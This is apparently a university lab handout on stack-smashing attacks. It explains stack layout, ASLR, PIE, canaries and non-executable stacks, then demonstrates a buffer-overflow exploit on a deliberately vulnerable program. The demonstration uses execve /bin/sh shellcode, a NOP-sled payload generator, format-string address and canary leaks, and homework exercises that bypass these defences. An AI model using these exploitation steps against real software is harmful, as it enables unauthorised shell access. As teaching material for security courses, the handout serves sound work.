Author: Eduardo R. B. Marques, DCC/FCUP
Code for the exercises in this class
Exercises marked with (C) will be covered in class, and exercises marked with (H) are left as homework.
Aim: A brief introduction to stack-smashing attacks.
In this class we will use the clang VM from the last class, which has the Clang/LLVM compiler infrastructure installed.
As in the last class, you may download the cssh.sh script and execute it as follows to connect to the clang VM using your GCP account:
$ chmod +x cssh.sh
$ ./cssh.sh clang
Welcome to Ubuntu 19.04 (GNU/Linux 5.0.0-1021-gcp x86_64)
...
xpto_gmail_com:~$
Inside the VM, fetch the examples for today's class and extract them. The following script will create a lab5code directory containing the examples.
$ curl https://www.dcc.fc.up.pt/~edrdo/aulas/qses/lectures/lab5/lab5code.tgz | tar xfz -
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 165 100 165 0 0 1006 0 --:--:-- --:--:-- --:--:-- 1006
$ cd lab5code
$ make clean all
Examine and execute the memareas program to get an intuition of different sections in a process address space and their likely addresses.
Example addresses
Printf [in plt]: 0x401030
Code [in text]: 0x401140
Constant [in rodata]: 0x402065
Global [data]: 0x404039
Heap: 0x606260
Stack: 0x7ffe90c243ab
Apart from the heap and the stack, the memory areas in the example are defined at compilation time and embedded into the ELF binary representation of the program. You may use the size utility to get their addresses:
$ size -Ax ./memareas
./memareas :
section size addr
...
.plt 0x30 0x401020
.text 0x3d1 0x401050
...
.rodata 0xd9 0x402000
...
.data 0x10 0x404028
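To cross-check the two listings, the following Python sketch (an illustration, not part of lab5code) tests which of the listed sections contains each example address. The section table is copied from the size output above; sections elided there ("...") are unknown to the sketch, and the helper name section_of is hypothetical.

```python
# Section table copied from the `size -Ax ./memareas` listing: name -> (start, size).
# Sections elided in that listing ("...") are not known here.
SECTIONS = {
    ".plt": (0x401020, 0x30),
    ".text": (0x401050, 0x3D1),
    ".rodata": (0x402000, 0xD9),
    ".data": (0x404028, 0x10),
}


def section_of(addr):
    """Return the name of the listed section containing addr, or None."""
    for name, (start, size) in SECTIONS.items():
        if start <= addr < start + size:
            return name
    return None


if __name__ == "__main__":
    # Example addresses printed by memareas (heap and stack are not ELF sections).
    examples = {
        "Printf": 0x401030,
        "Code": 0x401140,
        "Constant": 0x402065,
        "Global": 0x404039,
    }
    for label, addr in examples.items():
        print(f"{label:8} {addr:#x} -> {section_of(addr)}")
```

The first three addresses fall in .plt, .text and .rodata as expected. The global at 0x404039 lies just past the end of .data as listed (0x404028 + 0x10), so it presumably belongs to a section elided from the listing, such as .bss; the sketch reports it as None.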
Execute the fcall program to get an intuition of how the stack is laid out across a function call. The program uses a dump_stack() utility function (from util.c) that shows the contents of the stack at different program points. The FP and RA stack locations denote the frame pointer and return address respectively.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./fcall
-- main before call to f --
0 64 | 0x7ffea8eaf0d0 --> (nil) | 00 00 00 00 00 00 00 00
8 56 | 0x7ffea8eaf0d8 --> 0x401685 | 85 16 @ 00 00 00 00 00
16 48 | 0x7ffea8eaf0e0 --> 0x7fac23075b20 | [ 07 # ac 7f 00 00
24 40 | 0x7ffea8eaf0e8 --> (nil) | 00 00 00 00 00 00 00 00
32 32 | 0x7ffea8eaf0f0 --> 0x1c00401640 | @ 16 @ 00 1c 00 00 00
40 24 | 0x7ffea8eaf0f8 --> 0x401070 | p 10 @ 00 00 00 00 00
48 16 | 0x7ffea8eaf100 --> 0x7ffea8eaf1f8 | f8 f1 ea a8 fe 7f 00 00
56 8 | 0x7ffea8eaf108 --> 0x1 | 01 00 00 00 00 00 00 00
64 0 | 0x7ffea8eaf110 --> 0x401640 FP | @ 16 @ 00 00 00 00 00
72 -8 | 0x7ffea8eaf118 --> 0x7fac22e93b6b RA | k ; e9 " ac 7f 00 00
-- f --
0 80 | 0x7ffea8eaf070 --> (nil) | 00 00 00 00 00 00 00 00
8 72 | 0x7ffea8eaf078 --> 0x800401433 | 3 14 @ 00 08 00 00 00
16 64 | 0x7ffea8eaf080 --> 0x7 | 07 00 00 00 00 00 00 00
24 56 | 0x7ffea8eaf088 --> 0x8 | 08 00 00 00 00 00 00 00
32 48 | 0x7ffea8eaf090 --> 0x6 | 06 00 00 00 00 00 00 00
40 40 | 0x7ffea8eaf098 --> 0x5 | 05 00 00 00 00 00 00 00
48 32 | 0x7ffea8eaf0a0 --> 0x4 | 04 00 00 00 00 00 00 00
56 24 | 0x7ffea8eaf0a8 --> 0x3 | 03 00 00 00 00 00 00 00
64 16 | 0x7ffea8eaf0b0 --> 0x2 | 02 00 00 00 00 00 00 00
72 8 | 0x7ffea8eaf0b8 --> 0x1 | 01 00 00 00 00 00 00 00
80 0 | 0x7ffea8eaf0c0 --> 0x7ffea8eaf110 FP | 10 f1 ea a8 fe 7f 00 00
88 -8 | 0x7ffea8eaf0c8 --> 0x401233 RA | 3 12 @ 00 00 00 00 00
-- main after call to f --
0 64 | 0x7ffea8eaf0d0 --> 0x7 | 07 00 00 00 00 00 00 00
8 56 | 0x7ffea8eaf0d8 --> 0x8 | 08 00 00 00 00 00 00 00
16 48 | 0x7ffea8eaf0e0 --> 0x7fac23075b20 | [ 07 # ac 7f 00 00
24 40 | 0x7ffea8eaf0e8 --> (nil) | 00 00 00 00 00 00 00 00
32 32 | 0x7ffea8eaf0f0 --> 0x1c0000001b | 1b 00 00 00 1c 00 00 00
40 24 | 0x7ffea8eaf0f8 --> 0x24 | $ 00 00 00 00 00 00 00
48 16 | 0x7ffea8eaf100 --> 0x7ffea8eaf1f8 | f8 f1 ea a8 fe 7f 00 00
56 8 | 0x7ffea8eaf108 --> 0x1 | 01 00 00 00 00 00 00 00
64 0 | 0x7ffea8eaf110 --> 0x401640 FP | @ 16 @ 00 00 00 00 00
72 -8 | 0x7ffea8eaf118 --> 0x7fac22e93b6b RA | k ; e9 " ac 7f 00 00
r=36
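The rightmost column of each dump line appears to list the 8 bytes of the slot in memory order, with printable bytes shown as characters. Because x86-64 is little-endian, the value column is those bytes read in reverse order. The Python sketch below decodes that column under this assumed layout; slot_value is a hypothetical helper, not part of util.c.

```python
def slot_value(byte_column):
    """Decode the byte column of one dump_stack line into a 64-bit value.

    Two-character tokens are read as hex bytes; one-character tokens are
    read as the ASCII character that dump_stack printed for that byte.
    """
    raw = bytearray()
    for token in byte_column.split():
        if len(token) == 2:
            raw.append(int(token, 16))
        elif len(token) == 1:
            raw.append(ord(token))
        else:
            raise ValueError(f"unexpected token {token!r}")
    if len(raw) != 8:
        # A byte shown as a space character (0x20) is lost when splitting.
        raise ValueError("expected exactly 8 bytes")
    # x86-64 stores the least significant byte first.
    return int.from_bytes(raw, "little")


if __name__ == "__main__":
    print(hex(slot_value("10 f1 ea a8 fe 7f 00 00")))  # saved FP inside f
    print(hex(slot_value("3 12 @ 00 00 00 00 00")))    # RA inside f
```

For the two lines of f shown above, this yields 0x7ffea8eaf110 (the location of main's FP slot) and 0x401233 (the instruction in main right after the call). Lines containing a byte printed as a space, such as the one for 0x7fac23075b20, cannot be decoded this way.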
Disassemble the code of fcall
objdump -D fcall > fcall.dump
and open fcall.dump.
Under the Linux x86-64 calling convention for user-level code, registers %rdi, %rsi, %rdx, %rcx, %r8 and %r9 are used by main to pass the first 6 arguments to f (a1 to a6), and the remaining 2 arguments (a7 and a8) are passed through the stack. In line with the same convention, the result of f is returned in register %rax.
4011fd: bf 01 00 00 00 mov $0x1,%edi
401202: be 02 00 00 00 mov $0x2,%esi
401207: ba 03 00 00 00 mov $0x3,%edx
40120c: b9 04 00 00 00 mov $0x4,%ecx
401211: 41 b8 05 00 00 00 mov $0x5,%r8d
401217: 41 b9 06 00 00 00 mov $0x6,%r9d
40121d: 48 c7 04 24 07 00 00 movq $0x7,(%rsp)
401224: 00
401225: 48 c7 44 24 08 08 00 movq $0x8,0x8(%rsp)
40122c: 00 00
40122e: e8 2d ff ff ff callq 401160 <f>
401233: 48 89 45 e8 mov %rax,-0x18(%rbp)
You may also observe that f in turn loads the arguments passed on the stack into registers %rax and %r10 and, conversely, stores the arguments passed in registers into its stack frame. (The code performs many redundant operations, in particular copies between the stack and registers, because it was generated with optimisation turned off.)
401168: 48 8b 45 18 mov 0x18(%rbp),%rax
40116c: 4c 8b 55 10 mov 0x10(%rbp),%r10
401170: 48 89 7d f8 mov %rdi,-0x8(%rbp)
401174: 48 89 75 f0 mov %rsi,-0x10(%rbp)
401178: 48 89 55 e8 mov %rdx,-0x18(%rbp)
40117c: 48 89 4d e0 mov %rcx,-0x20(%rbp)
401180: 4c 89 45 d8 mov %r8,-0x28(%rbp)
401184: 4c 89 4d d0 mov %r9,-0x30(%rbp)
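The argument placement seen in the two listings can be summarised with a small Python sketch. It assumes that all arguments are integers or pointers (as they appear to be in fcall) and that the callee has set up %rbp in the usual way, so that 0x0(%rbp) holds the saved FP and 0x8(%rbp) the RA. The function names are hypothetical.

```python
# Registers used for the first six integer/pointer arguments.
INT_ARG_REGISTERS = ("%rdi", "%rsi", "%rdx", "%rcx", "%r8", "%r9")


def caller_location(n):
    """Where the caller places argument n (1-based) just before the call."""
    if n < 1:
        raise ValueError("arguments are numbered from 1")
    if n <= 6:
        return INT_ARG_REGISTERS[n - 1]
    offset = 8 * (n - 7)  # stack arguments are 8 bytes apart
    return f"{offset:#x}(%rsp)" if offset else "(%rsp)"


def callee_location(n):
    """Where the callee finds argument n once %rbp is set up."""
    if n < 1:
        raise ValueError("arguments are numbered from 1")
    if n <= 6:
        return INT_ARG_REGISTERS[n - 1]
    # Skip the saved FP at 0x0(%rbp) and the RA at 0x8(%rbp).
    return f"{0x10 + 8 * (n - 7):#x}(%rbp)"


if __name__ == "__main__":
    for n in range(1, 9):
        print(f"a{n}: caller {caller_location(n):10} callee {callee_location(n)}")
```

For a7 and a8 this gives (%rsp) and 0x8(%rsp) on the caller side, and 0x10(%rbp) and 0x18(%rbp) on the callee side, matching the movq and mov instructions in the listings.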
ASLR is enabled at the operating system level given that /proc/sys/kernel/randomize_va_space contains a non-zero value (you would need to have root access to change it to 0 and disable ASLR).
Execute fcall repeatedly and you will see that most addresses change. Some important addresses do not, however, notably the RA for f, which points to a location in main. The fcall program is not a position-independent executable (PIE), hence the addresses of code defined in fcall.c are fixed.
Recompile fcall using make clean fcall PIE=1 to generate position-independent code, and you'll see that the RA of f also changes on every run.
Now execute ./nr.sh ./fcall, a shorthand for setarch `uname -m` -R ./fcall, and you will see that no address changes from run to run. The program runs without any address randomization.
Recompile fcall again, this time using make clean fcall PIE=1 CANARIES=1. If you execute ./nr.sh ./fcall, you will now see that the stack locations just before the FP of each function change non-deterministically in every run. These locations contain canaries.
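For reference, the randomize_va_space setting mentioned at the start of this exercise takes one of three values according to the Linux kernel documentation. The Python sketch below, which is not part of lab5code, reads and interprets it; describe_aslr and read_aslr are hypothetical helper names, and read_aslr only works on a Linux system.

```python
# Meaning of /proc/sys/kernel/randomize_va_space, per the Linux sysctl docs.
ASLR_MODES = {
    0: "disabled",
    1: "mmap base, stack and vDSO randomised",
    2: "as 1, plus heap (brk) randomised",
}


def describe_aslr(raw):
    """Interpret the textual content of randomize_va_space."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, f"unknown setting {value}")


def read_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read the current setting (Linux only)."""
    with open(path) as handle:
        return describe_aslr(handle.read())


if __name__ == "__main__":
    print(read_aslr())
```

Note that this setting is system-wide, whereas nr.sh disables randomization for a single process through setarch -R.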
An x86-64 shellcode is given in lab5code/sc_x86_64.s. This is the same example as in the class slides, taken from http://shell-storm.org/shellcode. It can be used to conduct a stack-smashing attack that obtains a running /bin/sh shell through the execve system call.
.text
.globl _start
_start:
xor %rdx, %rdx
mov $0x68732f6e69622f2f, %rbx
shr $0x8, %rbx
push %rbx
mov %rsp, %rdi
push %rax
push %rdi
mov %rsp, %rsi
mov $0x3b, %al
syscall
You can compile the shellcode using sc_compile.sh and test whether it works using sc_exec as follows:
eduardorbmarques_gmail_com@clang:~/lab5code$ ./sc_compile.sh sc_x86_64.s
Compiling assembly code in ./sc_x86_64.s
Extracting shell code to ./sc_x86_64.bin
Hex dump
4831d248bb2f2f62696e2f736848c1eb08534889e750574889e6b03b0f05
eduardorbmarques_gmail_com@clang:~/lab5code$ ./sc_exec sc_x86_64.bin
sc_x86_64.bin: read instructions (30 bytes) ...
4831d248bb2f2f62696e2f736848c1eb08534889e750574889e6b03b0f05
$ echo This is a shell
This is a shell
$ ps
PID TTY TIME CMD
7640 pts/0 00:00:00 bash
8203 pts/0 00:00:00 sh
8205 pts/0 00:00:00 ps
$ exit
eduardorbmarques_gmail_com@clang:~/lab5code$
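The hex dump can be related back to the assembly source with a few lines of Python. The sketch below only inspects the bytes printed above and is not part of lab5code. It checks the length reported by sc_exec, shows how the 64-bit immediate spells the path of the shell in memory, and confirms that the code contains no NUL or newline bytes.

```python
# Hex dump printed by sc_compile.sh for sc_x86_64.s.
SHELLCODE_HEX = "4831d248bb2f2f62696e2f736848c1eb08534889e750574889e6b03b0f05"
# Immediate operand of the `mov $0x68732f6e69622f2f, %rbx` instruction.
IMMEDIATE = 0x68732F6E69622F2F


def as_memory_bytes(value):
    """Bytes of a 64-bit value as laid out in (little-endian) memory."""
    return value.to_bytes(8, "little")


shellcode = bytes.fromhex(SHELLCODE_HEX)

if __name__ == "__main__":
    print(len(shellcode))                   # number of bytes of shellcode
    print(as_memory_bytes(IMMEDIATE))       # string encoded by the immediate
    print(as_memory_bytes(IMMEDIATE >> 8))  # string pushed after `shr $0x8`
    print(b"\x00" in shellcode, b"\n" in shellcode)
```

The immediate encodes "//bin/sh", and the shift by 8 bits turns it into "/bin/sh" followed by a NUL terminator, so the terminator never has to appear in the code itself. The absence of newline bytes matters for the next exercise, since gets stops reading at a newline. The value 0x3b loaded into %al is 59, the execve system call number on Linux x86-64.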
Consider the program given in hello.c. We will exploit the obvious buffer overflow vulnerability in the call to gets using the name buffer as argument, by using an input of the form:
<nop sled><shell code><padding><redefined return address>
For that:
Disassemble hello
objdump -D hello > hello.dump
Looking at the assembly code, the distance between main's frame pointer and name can be determined, as illustrated below. Note that the %rdi register holds the first argument to gets; its value is name's address, computed relative to the frame pointer by the lea instruction (%rdi = %rbp - 0x90).
eduardorbmarques_gmail_com@clang:~/lab5code$ grep -n2 -e 'callq.*gets' hello.dump
411- 40119a: 48 8d bd 70 ff ff ff lea -0x90(%rbp),%rdi
412- 4011a1: 89 85 6c ff ff ff mov %eax,-0x94(%rbp)
413: 4011a7: e8 a4 fe ff ff callq 401050 <gets@plt>
414- 4011ac: 48 bf 19 20 40 00 00 movabs $0x402019,%rdi
415- 4011b3: 00 00 00
eduardorbmarques_gmail_com@clang:~/lab5code$ echo $((0x90))
144
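The same offset can be read directly from the instruction encoding, since the last four bytes of the lea instruction are a signed 32-bit little-endian displacement. The Python sketch below assumes exactly the 7-byte form shown in the listing (lea disp32(%rbp),%rdi); lea_displacement is a hypothetical helper.

```python
def lea_displacement(encoding_hex):
    """Signed displacement of `lea disp32(%rbp),%rdi` from its 7 encoding bytes."""
    raw = bytes.fromhex(encoding_hex)
    # 48 = REX.W prefix, 8d = lea opcode, bd = ModRM (disp32, %rdi, %rbp).
    if len(raw) != 7 or raw[:3] != bytes.fromhex("488dbd"):
        raise ValueError("not the expected lea disp32(%rbp),%rdi encoding")
    return int.from_bytes(raw[3:], "little", signed=True)


if __name__ == "__main__":
    disp = lea_displacement("48 8d bd 70 ff ff ff")
    fp_offset = -disp          # distance from name to the saved FP
    ra_offset = fp_offset + 8  # the RA sits right after the 8-byte saved FP
    print(disp, fp_offset, ra_offset)
```

For the instruction at 40119a the displacement is -144, so the saved FP lies 144 bytes after the start of name and the return address 152 bytes after it.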
Determine the address of name. In exercise 2, we'll see that this can be leaked through a format string vulnerability. For now, let us simply leak the address directly by uncommenting:
printf("%p\n", name);
Then execute the program to leak the address (0x7fffffffe2e0 is the example value shown below). We use the nr.sh script to launch hello with ASLR disabled.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
0x7fffffffe2e0
What’s your name?
^C
You may now generate a malicious payload using the provided sc_xploit.py script and feed it to hello as input. Note that we use the frame pointer offset (144) and the buffer address (0x7fffffffe2e0) obtained in the previous two steps.
eduardorbmarques_gmail_com@clang:~/lab5code$ (./sc_xploit.py sc_x86_64.bin 0x7fffffffe2e0 144 0;cat) | ./nr.sh ./hello
0x7fffffffe2e0
What’s your name?
Hello H1?H?//bin/shH?SH??PWH??;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????
echo This is a shell
This is a shell
ps
PID TTY TIME CMD
7640 pts/0 00:00:00 bash
9584 pts/0 00:00:00 bash
9585 pts/0 00:00:00 nr.sh
9588 pts/0 00:00:00 sh
9589 pts/0 00:00:00 cat
9590 pts/0 00:00:00 ps
^C
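The input layout used in this exercise (NOP sled, shellcode, padding, redefined return address) can be sketched in Python as follows. This is not the code of sc_xploit.py, which is not reproduced here; build_payload and its parameters are hypothetical. The sketch assumes that the return address is overwritten with the start address of the buffer and that the saved FP is simply covered by padding.

```python
import struct

NOP = b"\x90"  # x86 no-operation instruction


def build_payload(shellcode, buf_addr, fp_offset, sled_len=0, pad=b"A"):
    """Lay out <nop sled><shell code><padding><redefined return address>.

    fp_offset is the distance from the buffer to the saved FP; the return
    address is assumed to follow the 8-byte saved FP.
    """
    ra_offset = fp_offset + 8
    body = NOP * sled_len + shellcode
    if len(body) > ra_offset:
        raise ValueError("sled and shellcode do not fit before the RA")
    payload = body + pad * (ra_offset - len(body))
    # Redirect the return to the start of the buffer (little-endian, 8 bytes).
    payload += struct.pack("<Q", buf_addr)
    if b"\n" in payload:
        raise ValueError("gets would stop reading at the newline byte")
    return payload


if __name__ == "__main__":
    sc = bytes.fromhex(
        "4831d248bb2f2f62696e2f736848c1eb08534889e750574889e6b03b0f05"
    )
    payload = build_payload(sc, 0x7FFFFFFFE2E0, 144)
    print(len(payload), payload[-8:].hex())
```

With the values of this exercise the payload is 160 bytes long: 30 bytes of shellcode, 122 bytes of padding up to offset 152, and the 8-byte address. A real run would write the payload followed by a newline to the standard input of hello.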
Disable the executable stack setting for hello and then verify that the attack does not work anymore.
eduardorbmarques_gmail_com@clang:~/lab5code$ execstack -c hello # Disable executable code in the stack
eduardorbmarques_gmail_com@clang:~/lab5code$ (./sc_xploit.py sc_x86_64.bin 0x7fffffffe2e0 144 0;cat) | ./nr.sh ./hello
What’s your name?
Hello H1?H?//bin/shH?SH??PWH??;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????
./nr.sh: line 2: 22917 Segmentation fault (core dumped) setarch `uname -m` -R $*
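On Linux, whether a binary requests an executable stack is recorded in the flags of its PT_GNU_STACK program header, and execstack -c is documented as marking the binary as not requiring an executable stack. The Python sketch below reads that flag from a 64-bit little-endian ELF image; it is an illustration that is not part of lab5code, and stack_is_executable is a hypothetical helper.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type describing the stack
PF_X = 0x1                 # "executable" permission flag


def stack_is_executable(elf):
    """Return True/False from PT_GNU_STACK, or None if the header is absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF image")
    # ELF64 header fields: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38.
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for index in range(e_phnum):
        # Each ELF64 program header starts with p_type and p_flags.
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + index * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None


if __name__ == "__main__":
    import sys

    with open(sys.argv[1], "rb") as handle:
        print(stack_is_executable(handle.read()))
```

Running it on hello before and after execstack -c should show the flag changing from True to False. The same information is shown by readelf -lW hello in the GNU_STACK line (RWE versus RW).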
The hello program has a format string vulnerability, at the point where printf(name) is called. Since name is obtained through the gets call, the format is user-controllable.
The following two executions illustrate how printf may leak content corresponding to (missing but assumed) arguments. In particular, %n$p leaks the value of the n-th argument, as illustrated for "arguments" 1 and 6 below (0x6c6c6548 and 0x7ffff7fd1268).
./nr.sh ./hello
What’s your name?
%p %p %p %p %p %p
Hello 0x6c6c6548 0x7ffff7fbd580 (nil) 0x7ffff7fc2500 (nil) 0x7ffff7fd1268
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%1$p %6$p
Hello 0x6c6c6548 0x7ffff7fd1268
eduardorbmarques_gmail_com@clang:~/lab5code$
For a call to printf, in line with the x86-64 calling convention, the print format and first 5 format arguments will be passed through registers, and the remaining arguments will be passed through the stack. Hence the value of some registers (%rsi, %rdx, %rcx, %r8 and %r9 for the first 5 printf "arguments") and contents of the stack (for "arguments" 6 and above) can potentially be leaked.
Maybe the address of name is leaked? Let us look at the first 8 "printf arguments" ...
What’s your name?
1=%p 2=%p 3=%p 4=%p 5=%p 6=%p 7=%p 8=%p
Hello 1=0x6c6c6548 2=0x7ffff7fbd580 3=(nil) 4=0x7ffff7fc2500 5=(nil) 6=0x7ffff7fd1268 7=0x6f7ffe730 8=0x7fffffffe2e0
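The probing above can be automated with a short Python sketch. It builds the numbered %p format, parses the line printed by hello, and reports where each printf "argument" would come from under the calling convention (registers for 1 to 5, stack slots relative to %rsp at the time of the call from 6 onwards). All function names are hypothetical, and the parser assumes glibc's output style for %p, including (nil) for a null pointer.

```python
import re

# Registers holding printf "arguments" 1 to 5 (%rdi holds the format itself).
PRINTF_ARG_REGISTERS = ("%rsi", "%rdx", "%rcx", "%r8", "%r9")
LEAK = re.compile(r"(\d+)=(0x[0-9a-f]+|\(nil\))")


def probe_format(count):
    """Format string that labels and leaks "arguments" 1..count."""
    return " ".join(f"{n}=%p" for n in range(1, count + 1))


def arg_source(n):
    """Register or stack slot (at the time of the call) read for "argument" n."""
    if n < 1:
        raise ValueError("arguments are numbered from 1")
    if n <= 5:
        return PRINTF_ARG_REGISTERS[n - 1]
    offset = 8 * (n - 6)
    return f"{offset:#x}(%rsp)" if offset else "(%rsp)"


def parse_leak(line):
    """Map each argument number to the leaked value ((nil) becomes 0)."""
    return {
        int(n): 0 if value == "(nil)" else int(value, 16)
        for n, value in LEAK.findall(line)
    }


if __name__ == "__main__":
    print(probe_format(8))
    output = ("Hello 1=0x6c6c6548 2=0x7ffff7fbd580 3=(nil) 4=0x7ffff7fc2500 "
              "5=(nil) 6=0x7ffff7fd1268 7=0x6f7ffe730 8=0x7fffffffe2e0")
    for n, value in parse_leak(output).items():
        print(f"{n}: {value:#x} from {arg_source(n)}")
```

Feeding probe_format(8) to hello reproduces the input used above, and parse_leak turns the reply into values that can be compared with the address of name.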
Observe that "arguments" 2, 4, 6 and 8 look like memory addresses. Let us see if any of them point to strings, using the format %n$p %n$s for n = 2, 4, 6, 8.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%2$p %2$s
Hello 0x7ffff7fbd580
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%4$p %4$s
Hello 0x7ffff7fc2500
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%6$p %6$s
Hello 0x7ffff7fd1268 6
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./hello
What’s your name?
%8$p %8$s
Hello 0x7fffffffe2e0 %8$p %8$s
From the last run, it looks like the address of name is 0x7fffffffe2e0, since the supplied printf format (%8$p %8$s) is echoed back. Let us verify that by injecting the shellcode:
eduardorbmarques_gmail_com@clang:~/lab5code$ (./sc_xploit.py sc_x86_64.bin 0x7fffffffe2e0 144 0;cat) | ./nr.sh ./hello
What’s your name?
Hello H1?H?//bin/shH?SH??PWH??;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????
echo This is a shell
This is a shell
ps
PID TTY TIME CMD
12627 pts/2 00:00:00 bash
13109 pts/2 00:00:00 bash
13110 pts/2 00:00:00 nr.sh
13113 pts/2 00:00:00 sh
13114 pts/2 00:00:00 cat
13115 pts/2 00:00:00 ps
^C
Why does '%8$p' leak the address of name?
Consider the very naive and vulnerable open_sesame program, which lets a shell be executed when the user provides the correct passphrase ("open sesame"). The code has several similarities to an example given in the last lab class.
eduardorbmarques_gmail_com@clang:~/lab5code$ ./nr.sh ./open_sesame
What is your name?
Eduardo
Eduardo, hello! Now tell me the passphrase?
open sesame
You may have a shell! 'open sesame' = 'open sesame'
$ echo This is a shell
This is a shell
$ exit
Make sure you run ./nr.sh ./open_sesame in all questions below except 5.
(Easy) Take advantage of the buffer overflow vulnerabilities so that an invalid passphrase still lets the user run the shell. It may help to look at the stack frame offsets of each variable, e.g., using gdb or the disassembled code.
(Medium) Conduct two shellcode attacks as in the previous exercises, one for each call to gets in the program. First, leak the buffer addresses explicitly, then verify whether the format string vulnerability can be used to leak them. You may also place dump_stack calls in the code to help you.
(Medium) The previous attacks can be defeated by disabling executable code on the stack: execstack -c ./open_sesame. But can you overwrite the RA such that, on exit, main branches to the code location where the shell is created?
(Harder) Enable canaries using make clean open_sesame CANARIES=1. Verify that the format string vulnerability is able to leak canary values. Can you again overwrite the RA such that, on exit, main branches to the code location where the shell is created?
(Harder) Can ASLR be defeated too, i.e., when you run open_sesame "normally"? Does PIE code generation make a difference (compile the program using make clean open_sesame PIE=1)?